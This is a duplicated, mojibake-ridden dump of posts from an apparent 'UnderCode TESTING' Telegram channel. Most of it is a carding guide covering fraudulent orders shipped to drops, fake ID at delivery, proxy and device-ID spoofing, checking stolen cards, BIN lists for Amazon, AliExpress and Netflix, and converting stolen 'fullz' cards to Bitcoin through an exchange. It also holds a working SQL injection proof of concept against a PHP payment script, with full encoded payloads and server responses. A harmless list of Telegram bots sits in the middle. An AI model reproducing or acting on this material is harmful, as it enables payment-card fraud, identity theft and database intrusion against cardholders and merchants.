13. In Billing address enter CC holder address. Now proceed to payment.
14. I am sure if you do everything right then order will be successfully placed..
15. Wait for order to arrive to your shipping address. When they arrive the corier boy will call you. The ask for any ID card. If you can make fake ID card then good. Otherwise show your any ID card (Adhar Card, Voter ID, College ID card)
How to Card From Mobile:
Though I donβt prefer carding from mobile. But if you follow belowsteps carefully then you can do that.
Basic reqirements for carding from Mobile :
1. Mobile must be rooted. (offcourse I pref
er any Android smartphone)
2. You must install few apps : IMEI changer, Phone ID changer, Android ID changer, Proxy Droid, CCleaner
3. You can use HMA VPN for carding in mobile.
4. You use SOCK5 proxy with Proxy Droid apps.
5. You must change IMEI, Android ID etc evrything before starting carding.
6. Now connect proxy droid with SOCKS5 proxy and connect it.
7. Now follow all steps of carding that mentioned aboveβ¦
Ok, so you got your cc, your drop and try to be anonymous as you can make yourself.
Now, what sites are cardable?
-ANY AND ALL SITES ARE CARDABLE-
Why do I say that? because itβs true. Whatever your card, make sure that you have all your info prepared before carding it. If you donβt get success first time then you have to use other BIN CC and Others Method. Have used your brain & find different Logic for a different site. You may Kill 2-3 CC when trying any sites. But you will find out the working method for any site
OKβ¦.You know enough about CC. But donβt understand nothing.. Now let me clear all your doubt about acronyms and termsβ¦.
1. CC (Credit Card)
2. CCN (Credit Card Number) β Includes the number of the card and expiration date, no name or address.
3. CVV(Credit Verification Value) / (Card Security Code) / CVV2- The number on the back of the card used for verification purposes. 3 digit number for visa/mc and 4 digit for AMEX (American Express) (There is also CVV1 which is a verification number that is written into the magstripe on the back of the card that is read when the card is swiped)
4. Dropβ an address where you can send carded goods, not your own house or friend or relatives.
5. SSN (Social Security Number) β one of the details of CC holder, used to bypass security measures
6. MMN (Mothers Maiden Name) β Comes in handy when bypassing security measures on VBV/MCSC. One of your security question.
7. DOB β Date of Birth β Used to bypass some security measures.
8. COB (Change of Billing) β Some stores will only ship large/high priced items if the shipping and billing info match, these can be obtained through some cvv sellers, usually in the form of a βFullsβ
9. Fulls βYou listen many times βFulls/ Fullzβ. It is nothing but CC Details with more info eg. security question answers, SSN, DOB, MMN, etc. which can be used for COB, etc.
10. AVS (Address Verification Service) β System that checks the billing address entered against the credit card companyβs records.
11. VBV (Verified by Visa) β Extra verification process initially added by visa, there are different types of authentication used, most notably would be a password, date of birth, social security number, or mothers maiden name.
12. MCSC (MasterCard SecureCode) β MC (MasterCard) adopted this process after VBV came out, basically the same thing but with mastercards.
13. POS (Point of Sale) β Terminal at a physical shop where the card is swiped/read
14. Dump β The information that is written onto the magnetic stripe on the back of the card, the only way to get dump is with a skimmer, comes in different βtracksβ which I will not be explaining β a dump would look like
4131980030032319=11101010000000006460
15. Skimmer β A device that is normally attached to an atm where you insert your card, which records your card information (there are other variants, that is the most common)
14. I am sure if you do everything right then order will be successfully placed..
15. Wait for order to arrive to your shipping address. When they arrive the corier boy will call you. The ask for any ID card. If you can make fake ID card then good. Otherwise show your any ID card (Adhar Card, Voter ID, College ID card)
How to Card From Mobile:
Though I donβt prefer carding from mobile. But if you follow belowsteps carefully then you can do that.
Basic reqirements for carding from Mobile :
1. Mobile must be rooted. (offcourse I pref
er any Android smartphone)
2. You must install few apps : IMEI changer, Phone ID changer, Android ID changer, Proxy Droid, CCleaner
3. You can use HMA VPN for carding in mobile.
4. You use SOCK5 proxy with Proxy Droid apps.
5. You must change IMEI, Android ID etc evrything before starting carding.
6. Now connect proxy droid with SOCKS5 proxy and connect it.
7. Now follow all steps of carding that mentioned aboveβ¦
Ok, so you got your cc, your drop and try to be anonymous as you can make yourself.
Now, what sites are cardable?
-ANY AND ALL SITES ARE CARDABLE-
Why do I say that? because itβs true. Whatever your card, make sure that you have all your info prepared before carding it. If you donβt get success first time then you have to use other BIN CC and Others Method. Have used your brain & find different Logic for a different site. You may Kill 2-3 CC when trying any sites. But you will find out the working method for any site
OKβ¦.You know enough about CC. But donβt understand nothing.. Now let me clear all your doubt about acronyms and termsβ¦.
1. CC (Credit Card)
2. CCN (Credit Card Number) β Includes the number of the card and expiration date, no name or address.
3. CVV(Credit Verification Value) / (Card Security Code) / CVV2- The number on the back of the card used for verification purposes. 3 digit number for visa/mc and 4 digit for AMEX (American Express) (There is also CVV1 which is a verification number that is written into the magstripe on the back of the card that is read when the card is swiped)
4. Dropβ an address where you can send carded goods, not your own house or friend or relatives.
5. SSN (Social Security Number) β one of the details of CC holder, used to bypass security measures
6. MMN (Mothers Maiden Name) β Comes in handy when bypassing security measures on VBV/MCSC. One of your security question.
7. DOB β Date of Birth β Used to bypass some security measures.
8. COB (Change of Billing) β Some stores will only ship large/high priced items if the shipping and billing info match, these can be obtained through some cvv sellers, usually in the form of a βFullsβ
9. Fulls βYou listen many times βFulls/ Fullzβ. It is nothing but CC Details with more info eg. security question answers, SSN, DOB, MMN, etc. which can be used for COB, etc.
10. AVS (Address Verification Service) β System that checks the billing address entered against the credit card companyβs records.
11. VBV (Verified by Visa) β Extra verification process initially added by visa, there are different types of authentication used, most notably would be a password, date of birth, social security number, or mothers maiden name.
12. MCSC (MasterCard SecureCode) β MC (MasterCard) adopted this process after VBV came out, basically the same thing but with mastercards.
13. POS (Point of Sale) β Terminal at a physical shop where the card is swiped/read
14. Dump β The information that is written onto the magnetic stripe on the back of the card, the only way to get dump is with a skimmer, comes in different βtracksβ which I will not be explaining β a dump would look like
4131980030032319=11101010000000006460
15. Skimmer β A device that is normally attached to an atm where you insert your card, which records your card information (there are other variants, that is the most common)
16. Embosser β A device that βstampsβ the cards to produce the raised lettering
17. Tipper β A device that adds the gold/silver accents to the embossed characters
18. MSR (Magnetic Stripe Reader/Writer) Used in the carding scene for writing dumps (and drivers license, student ID) info to blank cards or gift cards (if you want to use blank white cards, you will need a printer for the card template, embosser/tipper also, which can get costly to buy)
19. BIN (Bank Identification Number) β The first 6 digits of a card number (this will be gone over in more detail later on)
20. Novs (Novelty ID / Fake ID) β Commonly used for signing at drops, store pickups, WU Drops, Bank Drops, etc.
21. VPN (Virtual Privat
e Network ) β This will change your IP to wherever the location is of the VPN server. This is used with an application rather than through your browser as with socks. Watch out as some VPN providers will keep logs. But it leaks our DNS info so it is not safe
22. BTC (Bitcoin) β It is a digital currency. Used for buying anything in the digital world. You need it to buy CC, SOCKS, VPN etc and even you can exchange your local currency (INR/Dollar etc) to BTC. You can create wallet here www.blockchain.com
Few things you must remember before starting Carding:
Security to me is a key aspect of carding. However, an important thing to note is that IF THEY WANT TO GET YOU THAT BADLY; THEN THEY WILL NO MATTER WHAT.
Here are a few key security aspects you should take into consideration before getting started:
β When you have a CC, the next step is to get a socks5 in either the same city and state as the cardholder or as close to it as you can find. You must use socks.
β I personally use Firefox since it is stable, easy to use, you can load many unique and helpful plugins (tamper data, sniffers, etc).
β Many carders get sloppy over time and will neglect to clear history, or instead of shutting down their computer just put it to sleep so they donβt have to wait for it to decrypt, etc. Moral here? DONβT BE A LAZY!
β Emails β I personally use a new email for every site I card. Either Gmail or Yahoo works well for me.
How to know what is brand of CC at a glance:
If CCN (Credit Card Number) start with 3 then it is American Express (AMEX), if it starts with 4 then it is Visa, if it starts with 5 then itβs Mastercardβ¦With VBV CC, most notably would be a password, date of birth, social security number, or mothers maiden name.
**In order to get by VBV you need the password, if you want to reset the password then you will need the DOB (date of birth), MMN (mothers maiden name), and SSN (social security number). So I personally prefer always By NON-VBV Credit Card
How to check CC Is Live or Dead:
There are so many websites that check CC live or dead. At the time of checking they charge CC $0.001. But almost 80% site kill the CC. So we never use it. There also few tools available on the internet for checking CC. It may be Backdoor/ Trojan. So donβt use itβ¦..
There is no easy method for that. Carder makes there own way to do that. One of them is β¦ Go to any porn website. Buy the membership and use your CC. If you got success then CC is Live. You must follow carding rule. Like using socks, rdp bla.. blah.
Search youtube for find latest method. Or google it βHow to check CC is live or Deadβ. You will get so many latest method.
How to check CC Balance (Skype Method):
This method only working for US & UK CC only
1. Check your BIN in www.binspro.com There you will get bank name. For above example, BIN (430587) bank is Capital One, USA.
2. Now search phone number of this bank in google. For Capital One itβs +1-800-935-9935
3. Call this number from skype itβs free since itβs toll-free number.
4. Now the automatic robot will ask you few details. Ex. CCN, CVV etc.
5. Now put your info by using your keyboard.
6. It will automatically tell you the CC balance.
WRITTEN BY uNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
17. Tipper β A device that adds the gold/silver accents to the embossed characters
18. MSR (Magnetic Stripe Reader/Writer) Used in the carding scene for writing dumps (and drivers license, student ID) info to blank cards or gift cards (if you want to use blank white cards, you will need a printer for the card template, embosser/tipper also, which can get costly to buy)
19. BIN (Bank Identification Number) β The first 6 digits of a card number (this will be gone over in more detail later on)
20. Novs (Novelty ID / Fake ID) β Commonly used for signing at drops, store pickups, WU Drops, Bank Drops, etc.
21. VPN (Virtual Privat
e Network ) β This will change your IP to wherever the location is of the VPN server. This is used with an application rather than through your browser as with socks. Watch out as some VPN providers will keep logs. But it leaks our DNS info so it is not safe
22. BTC (Bitcoin) β It is a digital currency. Used for buying anything in the digital world. You need it to buy CC, SOCKS, VPN etc and even you can exchange your local currency (INR/Dollar etc) to BTC. You can create wallet here www.blockchain.com
Few things you must remember before starting Carding:
Security to me is a key aspect of carding. However, an important thing to note is that IF THEY WANT TO GET YOU THAT BADLY; THEN THEY WILL NO MATTER WHAT.
Here are a few key security aspects you should take into consideration before getting started:
β When you have a CC, the next step is to get a socks5 in either the same city and state as the cardholder or as close to it as you can find. You must use socks.
β I personally use Firefox since it is stable, easy to use, you can load many unique and helpful plugins (tamper data, sniffers, etc).
β Many carders get sloppy over time and will neglect to clear history, or instead of shutting down their computer just put it to sleep so they donβt have to wait for it to decrypt, etc. Moral here? DONβT BE A LAZY!
β Emails β I personally use a new email for every site I card. Either Gmail or Yahoo works well for me.
How to know what is brand of CC at a glance:
If CCN (Credit Card Number) start with 3 then it is American Express (AMEX), if it starts with 4 then it is Visa, if it starts with 5 then itβs Mastercardβ¦With VBV CC, most notably would be a password, date of birth, social security number, or mothers maiden name.
**In order to get by VBV you need the password, if you want to reset the password then you will need the DOB (date of birth), MMN (mothers maiden name), and SSN (social security number). So I personally prefer always By NON-VBV Credit Card
How to check CC Is Live or Dead:
There are so many websites that check CC live or dead. At the time of checking they charge CC $0.001. But almost 80% site kill the CC. So we never use it. There also few tools available on the internet for checking CC. It may be Backdoor/ Trojan. So donβt use itβ¦..
There is no easy method for that. Carder makes there own way to do that. One of them is β¦ Go to any porn website. Buy the membership and use your CC. If you got success then CC is Live. You must follow carding rule. Like using socks, rdp bla.. blah.
Search youtube for find latest method. Or google it βHow to check CC is live or Deadβ. You will get so many latest method.
How to check CC Balance (Skype Method):
This method only working for US & UK CC only
1. Check your BIN in www.binspro.com There you will get bank name. For above example, BIN (430587) bank is Capital One, USA.
2. Now search phone number of this bank in google. For Capital One itβs +1-800-935-9935
3. Call this number from skype itβs free since itβs toll-free number.
4. Now the automatic robot will ask you few details. Ex. CCN, CVV etc.
5. Now put your info by using your keyboard.
6. It will automatically tell you the CC balance.
WRITTEN BY uNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Amazon Right Bin cc is available.
Bin Amazon Shopping
> Bin : 41472023xxxxxxxx
Date : 10/21
Cvv : 666
> IP : USA
Bin Amazon Shopping
> Bin : 41472023xxxxxxxx
Date : 10/21
Cvv : 666
> IP : USA
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Ali express bins
t.me/UndercodeTesting
51080501528xxxxx
08/22
Ip - USA
π¦Bins : Netflix
545404xxxxxxxxxx
530998xxxxxxxxxx
518695xxxxxxxxxx
IP: BRAZIL
CCLEANER V4.20.3 B800006534 [PRO]
> https://play.google.com/store/apps/details?id=com.piriform.ccleaner>
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Ali express bins
t.me/UndercodeTesting
51080501528xxxxx
08/22
Ip - USA
π¦Bins : Netflix
545404xxxxxxxxxx
530998xxxxxxxxxx
518695xxxxxxxxxx
IP: BRAZIL
CCLEANER V4.20.3 B800006534 [PRO]
> https://play.google.com/store/apps/details?id=com.piriform.ccleaner>
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦BEST TELEGRAM BOTS YOU SHOULD KNOW RECOMMENDED BY UNDERCODE:
1) BotFather
BotFather is the official Telegram Bot used to create bots and change settings for existing ones.
Youβll need BotFather even if youβre not going to make your own bots as a bot developer. Some bots for Telegram channel admins will ask you to use BotFather to generate Telegram Bot API tokens. So itβs good to get familiar with this procedure before we go any further.
Creating a new Telegram bot is pretty straightforward.
Just open BotFather, send /newbot command, pick a name and a username:
2) ControllerBot
ControllerBot is a feature-rich bot for Telegram channel owners.
It allows you to:
write rich-text posts with Markdown/HTML markup;
add reaction buttons (Emoji, text or both);
add button to open post comments;
schedule posts;
add self-destruct timer for temporary posts;
see channel stats.
Here is an example of how post reactions can be added with ControllerBot:
3)LivegramBot
LivegramBot is a feedback bot constructor.
Here is a self-explanatory example of this bot usage:
Feedback bots like this one can be used for everything: channels, group, bots and even websites.
4) VoteBot
VoteBot is a bot for creating polls in Telegram. Polls can be shared with friends or published in channels and groups.
Using VoteBot is very simple:
When poll is created, type @vote in your channel to open polls list:
5) Giphy GIF Search
Giphy GIF Search is a bot for searching and posting gifs. It can be used with channels as well.
Type @gif with a search query in your channel and gif suggestions will show up:
6) Telegraph
telegra.ph is a minimalistic publishing tool, that allows you to create rich-formatted posts with images, videos and other embedded stuff.
Telegram supports Instant View for the posts published with telegra.ph. It allows to read your posts right in the Telegram app, without visiting any other websites.
To manage your telegra.ph publications and log in across any number of devices try the official Telegraph bot.
7)InviteMember
InviteMember is a bot platform for subscription/membership bots
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦BEST TELEGRAM BOTS YOU SHOULD KNOW RECOMMENDED BY UNDERCODE:
1) BotFather
BotFather is the official Telegram Bot used to create bots and change settings for existing ones.
Youβll need BotFather even if youβre not going to make your own bots as a bot developer. Some bots for Telegram channel admins will ask you to use BotFather to generate Telegram Bot API tokens. So itβs good to get familiar with this procedure before we go any further.
Creating a new Telegram bot is pretty straightforward.
Just open BotFather, send /newbot command, pick a name and a username:
2) ControllerBot
ControllerBot is a feature-rich bot for Telegram channel owners.
It allows you to:
write rich-text posts with Markdown/HTML markup;
add reaction buttons (Emoji, text or both);
add button to open post comments;
schedule posts;
add self-destruct timer for temporary posts;
see channel stats.
Here is an example of how post reactions can be added with ControllerBot:
3)LivegramBot
LivegramBot is a feedback bot constructor.
Here is a self-explanatory example of this bot usage:
Feedback bots like this one can be used for everything: channels, group, bots and even websites.
4) VoteBot
VoteBot is a bot for creating polls in Telegram. Polls can be shared with friends or published in channels and groups.
Using VoteBot is very simple:
When poll is created, type @vote in your channel to open polls list:
5) Giphy GIF Search
Giphy GIF Search is a bot for searching and posting gifs. It can be used with channels as well.
Type @gif with a search query in your channel and gif suggestions will show up:
6) Telegraph
telegra.ph is a minimalistic publishing tool, that allows you to create rich-formatted posts with images, videos and other embedded stuff.
Telegram supports Instant View for the posts published with telegra.ph. It allows to read your posts right in the Telegram app, without visiting any other websites.
To manage your telegra.ph publications and log in across any number of devices try the official Telegraph bot.
7)InviteMember
InviteMember is a bot platform for subscription/membership bots
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Fast CC TO BTC :
> CC TO BTC TRICK
- Buy A Fresh Fullz CC (Visa/Mastercard)From Trusted Vendors Or *ME* (Fullz Have SSN)
- If You Bought Dallas(city),Texas(st) Cc Use Dallas Ip (must use 911 vpn or Rdp)
-After Connecting ip Go to outlook and make an email same as Cc Owner Name
- Then Go to cex.io ( cex.io is the best site to buy btc from credit cards)
- Register A New Account . Use Outlook eMail To Register as New :)
- After Registering, Verify your Email
- Ok Then We Can Add Balance To Cex.io ...... Click On Deposit then it will be redirect to payment gate.
- Now Fill Cc Details & Choose The Amount ( Choose Below 150$ First then succeeded we Can add more)
- Then Fill the Billing Address & SSN (Fullz Cc Will Have Billing Address & SSN)
- Then Click Proceed
- Then Account Will Be Funded with your choosed Amount (unless you use dead card) & After Success Fund More Amount How Much You Can Do With The Credit Card
- Now go to home page and click Buy/Sell
- Buy Bitcoin With Your Deposited Amount (If You deposited 700$ buy btc below 700$)
- Now you'll be turned into 700$ to Btc
- Now Go to Withdraw select Btc Then put your wallet address & select amount then click withdraw
Hurreyyy!!!! Now The Btc Instantly Will transfer to Your wallet.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Fast CC TO BTC :
> CC TO BTC TRICK
- Buy A Fresh Fullz CC (Visa/Mastercard)From Trusted Vendors Or *ME* (Fullz Have SSN)
- If You Bought Dallas(city),Texas(st) Cc Use Dallas Ip (must use 911 vpn or Rdp)
-After Connecting ip Go to outlook and make an email same as Cc Owner Name
- Then Go to cex.io ( cex.io is the best site to buy btc from credit cards)
- Register A New Account . Use Outlook eMail To Register as New :)
- After Registering, Verify your Email
- Ok Then We Can Add Balance To Cex.io ...... Click On Deposit then it will be redirect to payment gate.
- Now Fill Cc Details & Choose The Amount ( Choose Below 150$ First then succeeded we Can add more)
- Then Fill the Billing Address & SSN (Fullz Cc Will Have Billing Address & SSN)
- Then Click Proceed
- Then Account Will Be Funded with your choosed Amount (unless you use dead card) & After Success Fund More Amount How Much You Can Do With The Credit Card
- Now go to home page and click Buy/Sell
- Buy Bitcoin With Your Deposited Amount (If You deposited 700$ buy btc below 700$)
- Now you'll be turned into 700$ to Btc
- Now Go to Withdraw select Btc Then put your wallet address & select amount then click withdraw
Hurreyyy!!!! Now The Btc Instantly Will transfer to Your wallet.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦The 2018 Paypall CVE IS NOW PUBLIC FREE
> PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection
t.me/UndercodeTesting
π¦Tested by Undercode :
# POC:
# 1)
# http://localhost/[PATH]/index.php?p=accomodation&q=[SQL]
#
#[PATH]/accomodation.php
#...
#50 $query = "SELECT * FROM
#51
#52
#53 }elseif(isset($_GET['q'])){
#54
#55 $query = "SELECT * FROM
#56
#57
#58
#59 }
#60
#61 $accomodation = ' | ' . $_GET['q'];
#62 ?>
#...
GET /[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 19:55:17 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/index.php?p=rooms&q=[SQL]
#
#[PATH]/room_rates.php
#...
#50 $query = "SELECT * FROM
#51
#52
#53 }elseif(isset($_GET['q'])){
#54
#55 $query = "SELECT * FROM
#56
#57
#58 }else{
#59 $query = "SELECT * FROM
#60 }
#61
#62 $accomodation = ' | ' . @$_GET['q'];
#63 ?>
#...
GET /[PATH]/index.php?p=rooms&q=RM%20223%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 19:58:47 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/[PATH]/admin/login.php
#
#[PATH]/admin/login.php
#...
#58 if (isset($_POST['btnlogin'])) {
#59 //form has been submitted1
#60
#61 $uname = trim($_POST['email']);
#62 $upass = trim($_POST['pass']);
#...
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦The 2018 Paypall CVE IS NOW PUBLIC FREE
> PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection
t.me/UndercodeTesting
π¦Tested by Undercode :
# POC:
# 1)
# http://localhost/[PATH]/index.php?p=accomodation&q=[SQL]
#
#[PATH]/accomodation.php
#...
#50 $query = "SELECT * FROM
tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND ACCOMODATION='" . $_GET['q'] . "' AND NUMPERSON = " . $_POST['person'];#51
#52
#53 }elseif(isset($_GET['q'])){
#54
#55 $query = "SELECT * FROM
tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND ACCOMODATION='" . $_GET['q'] . "'"; #56
#57
#58
#59 }
#60
#61 $accomodation = ' | ' . $_GET['q'];
#62 ?>
#...
GET /[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 19:55:17 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/index.php?p=rooms&q=[SQL]
#
#[PATH]/room_rates.php
#...
#50 $query = "SELECT * FROM
tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND NUMPERSON = " . $_POST['person'];#51
#52
#53 }elseif(isset($_GET['q'])){
#54
#55 $query = "SELECT * FROM
tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND ROOM LIKE '%" . $_GET['q'] . "%'"; #56
#57
#58 }else{
#59 $query = "SELECT * FROM
tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID";#60 }
#61
#62 $accomodation = ' | ' . @$_GET['q'];
#63 ?>
#...
GET /[PATH]/index.php?p=rooms&q=RM%20223%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 19:58:47 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/[PATH]/admin/login.php
#
#[PATH]/admin/login.php
#...
#58 if (isset($_POST['btnlogin'])) {
#59 //form has been submitted1
#60
#61 $uname = trim($_POST['email']);
#62 $upass = trim($_POST['pass']);
#...
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ how to buy a working cc ?
pinterest.com/undercode_Testing
> Are u a hacker then u easily bypass otp or you don't know ss7 attack. Then buy ssn+dob payment base cc. It cc don't require otp on payment. You fill ssn+dob on payment getway. then pay is susses.
π¦ Where i buy amazon egift cards??
1) Go on
https://www.mtcgame.com/en-GB
2) Login on your created account.
It payment getaway is easy and 1 more site https://www.mygiftcardsupply.com/shop/amazon-gift-cards/
have easy pay. Getway .
π¦ Carding tools
Socks5/rdp ,mac address changer,ccleaner.
π¦ How to use securely???
Socks5/rdp.-- You do not use the same zip code for the owner of cc or cc. use rdp/socks5 according to state.
Don't clean cookies in carding time.
Then fill ssn and dob on payment getway..
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ how to buy a working cc ?
pinterest.com/undercode_Testing
> Are u a hacker then u easily bypass otp or you don't know ss7 attack. Then buy ssn+dob payment base cc. It cc don't require otp on payment. You fill ssn+dob on payment getway. then pay is susses.
π¦ Where i buy amazon egift cards??
1) Go on
https://www.mtcgame.com/en-GB
2) Login on your created account.
It payment getaway is easy and 1 more site https://www.mygiftcardsupply.com/shop/amazon-gift-cards/
have easy pay. Getway .
π¦ Carding tools
Socks5/rdp ,mac address changer,ccleaner.
π¦ How to use securely???
Socks5/rdp.-- You do not use the same zip code for the owner of cc or cc. use rdp/socks5 according to state.
Don't clean cookies in carding time.
Then fill ssn and dob on payment getway..
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Pinterest
UnderCode TESTING (UNDERCODE_TESTING) - Profile | Pinterest
UnderCode TESTING | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011